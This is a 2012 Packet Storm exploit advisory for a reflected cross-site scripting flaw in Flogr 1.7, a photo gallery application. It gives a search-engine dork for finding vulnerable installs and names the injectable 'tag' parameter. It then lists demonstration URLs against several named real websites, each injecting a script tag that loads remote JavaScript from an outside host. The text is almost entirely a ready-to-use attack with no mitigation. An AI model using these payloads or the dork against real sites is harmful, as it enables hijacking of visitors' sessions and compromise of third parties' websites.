Flogr 1.7 Cross Site Scripting

2012-07-09T00:00:00
ID PACKETSTORM:114548
Type packetstorm
Reporter Nafsh
Modified 2012-07-09T00:00:00

Description

                                        
                                            `#############################################################################################  
# #  
# Exploit Title : Flogr V1.7 Xss Vulnerability #  
# #  
# Author : Iranian Security & Research Team #  
# #  
# Discovered By : Nafsh #  
# #  
# Home : sec-lab.ir #  
# #  
# Contact : research [at] sec-lab [dot] ir #  
# #  
# Date : 23/1/2012 - 16:00 #  
# #  
# Source : www.flogr.googlecode.com #  
# #  
# DorK : inurl:"tag=" "powered by flogr v1.7" #  
# #  
#############################################################################################  
# #  
# Expl0iTs: #  
# #  
# http://[TARGET]/recent.php?tag=[xss] #  
# #  
# http://[TARGET]/index.php?tag=[xss] #  
# #  
#############################################################################################  
# #  
# Dem0 : #  
# #  
# fotos.pecesama.net/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E #  
# #  
# localsrock.com/bigpictureproject/index.php?tag=<script src%3d//ckers.org/s></script> #  
# #  
# rowmanitoba.ca/flogr-1.7.2/recent.php?tag=<script src%3d//ckers.org/s></script> #  
# #  
# john.org.ua/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E #  
# #  
#############################################################################################  
# #  
# We are : K0242 | Nafsh | Ehram.shahmohamadi #  
# #  
# Greetz : All sec-lab researchers #  
# #  
#############################################################################################  
`